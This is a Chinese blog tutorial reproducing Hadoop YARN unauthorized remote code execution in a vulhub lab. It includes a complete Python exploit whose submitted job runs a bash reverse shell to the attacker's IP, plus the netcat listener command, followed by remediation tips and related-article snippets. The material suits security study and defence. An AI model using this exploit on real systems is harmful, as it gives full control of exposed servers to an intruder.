Hadoop未授权访问 getshell——漏洞复现

最新推荐文章于 2024-12-25 12:00:55 发布
最新推荐文章于 2024-12-25 12:00:55 发布
阅读量1.1w 收藏 11
点赞数 3
分类专栏: # 未授权访问 文章标签: hadoop 大数据 big data
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/121162267
版权

一、 Hadoop未授权访问漏洞介绍

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。

二、靶场搭建

靶机: ubuntu
IP: 192.168.241.142

攻击机: kali
IP: 192.168.241.128

直接使用 vluhub 环境了

cd hadoop/unauthorized-yarn
docker-compose up -d

在这里插入图片描述

四、漏洞复现

4.1、访问 http://ip:8088 即可看到Hadoop YARN ResourceManager WebUI页面(未授权访问漏洞)
在这里插入图片描述
4.2、利用过程如下:

在本地监听等待反弹 shell 连接
调用 New Application API 创建 Application
调用 Submit Application API 提交

exp——python脚本:

#python exp:
    
#!/usr/bin/env python

import requests

target = 'http://192.168.241.142:8088/'
lhost = '192.168.241.128' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

kali打开 nc 监听端口

nc -nvlp 9999

在这里插入图片描述
运行脚本,获取shell

python Hadoop-poc.py

在这里插入图片描述
执行完脚本之后,查看kali,发现成功反弹shell
在这里插入图片描述

四、漏洞修复

1、如无必要,关闭 Hadoop Web 管理页面。
2、开启身份验证,防止未经授权用户访问。
3、设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端口。

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

web渗透测试漏洞复现Hadoop 未授权访问漏洞复现getshell
HACKONE的博客
03-28 1024
Hadoop是一个开源的分布式计算框架,由Apache软件基金会开发并维护。Hadoop主要用于处理和分析海量数据集,能够在由普通硬件构成的大规模集群上运行,具备高可靠性和高扩展性。HDFS是一个高度容错性的分布式文件系统,设计用于在廉价硬件上存储海量数据。数据会被切割成块并分布在集群中的多个节点上,以实现数据冗余和故障恢复。MapReduce:MapReduce是一个分布式编程模型,用于处理大规模数据集。它将复杂的计算任务拆分成两个主要阶段:Map阶段和Reduce阶段,允许数据并行处理。
漏洞复现 || Hadoop未授权访问反弹Shell漏洞
失心少年
07-13 1336
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop-未授权访问漏洞复现
weixin_43071873的博客
11-18 1783
漏洞介绍: Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 漏洞复现: 使用vulhub搭建靶场 搭建完进入镜像,成功搭建 进入靶场。靶机ip:8088 exp如下: ##!/usr/bin/env python import requests import sys targe
未授权访问Hadoop 未授权访问漏洞
qq_68163788的博客
05-20 2650
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop 未授权访问 getshell
weixin_44522540的博客
01-19 4822
漏洞概述 YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为。 受影响范围 Apache Hadoop YARN资源管理系统 环境搭建 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d 环境搭建成功,未授权访问到页面 #!/usr
Hadoop未授权访问漏洞
可爱的我可爱的code
11-19 5045
漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以通过命令行操作多个目录下 的数据,如进行删除,下载,目录浏览甚至命令行行等操作,产生极大的危害。 环境 vulnhub 测试 启动环境 docker-compose up -d 访问 http://192.168.0.100:8088/cluster 通过REST API命令执行 利用过程: 在本地监听端
Hadoop未授权访问漏洞复现
最新发布
weixin_70684190的博客
12-25 556
然后通过访问IP:8088端口,如果出现这个页面,则表示环境搭建成功!但是需要安装python3的环境,和导入request库。大家在网上自行寻找搭建步骤。
Hadoop YARN ResourceManager 未授权访问getshell
09-23
利用Hadoop YARN ResourceManager 未授权访问getshell工具以及WORD说明
Hadoop未授权访问getshell
Birdman-one的博客
12-11 1663
Hadoop未授权访问getshell 一、环境搭建 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d http://ip:8088/cluster 访问地址出现此页面代表未授权访问 二、漏洞复现 exp #!/usr/bin/env python import requests target = 'http://xx.xx.xx.xx:8088/' lhost = 'x.x.x.x' # 把你的本地主机ip放在这里,在9999端口监
Hadoop 未授权访问漏洞复现
qq_68581192的博客
05-26 1236
Hadoop是一个由 Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop机器HDFS的50070 web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
数据库安全:Hadoop 未授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 4295
Hadoop 未授权访问主要因HadoopYARN资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
Hadoop 漏洞复现
MrHatSec的博客
08-01 6900
Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。
Hadoop-yarn-unauthorized 未授权访问漏洞
weixin_68177269的博客
08-13 652
Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当可导致未授权访问的问题,攻击者无需认证即可通过REST API部署任务来执行任意指令,最终完全控制服务器。靶场启动完成后,使用nmap扫描本机开放的端口,发现已经开启8088(yarn资源管理系统)
Hadoop-yarn-未授权访问漏洞
qq_42735101的博客
06-26 2262
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-未授权访问漏洞复现
hadoop漏洞_Hadoop 未授权访问漏洞(exp核心代码实现)
weixin_35758982的博客
12-06 8549
一、环境搭建:进入镜像目录:cd vulhub/hadoop/unauthorized-yarn启动环境:docker-compose up -d访问8088端口二、漏洞描述:Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,...
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现
ran的博客
05-05 3643
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
Hadoop Yarn REST API未授权漏洞排查
dayouzi的博客
08-14 902
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。
hadoop未授权访问
10-21
Hadoop未授权访问指的是用户在尝试访问Hadoop集群资源时,未经授权的权限要求被拒绝。这可能是因为用户没有正确的用户名和密码,或者缺乏足够的权限来执行所需的操作。 要解决Hadoop未授权访问的问题,可以采取以下步骤: 1. 检查用户名和密码:确保用于访问Hadoop集群的用户名和密码是正确的。如果是通过Web界面或API进行访问,确保输入的凭据是正确的,并且没有拼写错误。 2. 检查权限:查看用户是否具有执行所需操作的权限。Hadoop通常使用基于角色的访问控制(RBAC)来管理权限。确保用户被分配了正确的角色,并且角色具有所需的权限。 3. 检查防火墙设置:如果Hadoop集群位于防火墙后面,确保相应的端口已打开,以允许用户访问集群资源。 4. 检查配置文件:在Hadoop配置文件中,如core-site.xml和hdfs-site.xml,确保没有错误的配置或权限设置。验证这些文件中的配置是否正确,并根据需要进行修复。 5. 检查网络连接:确保用户的网络连接稳定,没有任何网络问题。如果网络连接不稳定,可能会导致Hadoop集群无法访问。 6. 检查Hadoop日志:查看Hadoop集群的日志,了解是否有关于访问被拒绝的错误消息。根据错误消息的提示,采取相应的措施来解决访问问题。 通过以上步骤,您应该能够解决Hadoop未授权访问的问题,并成功访问和管理Hadoop集群资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值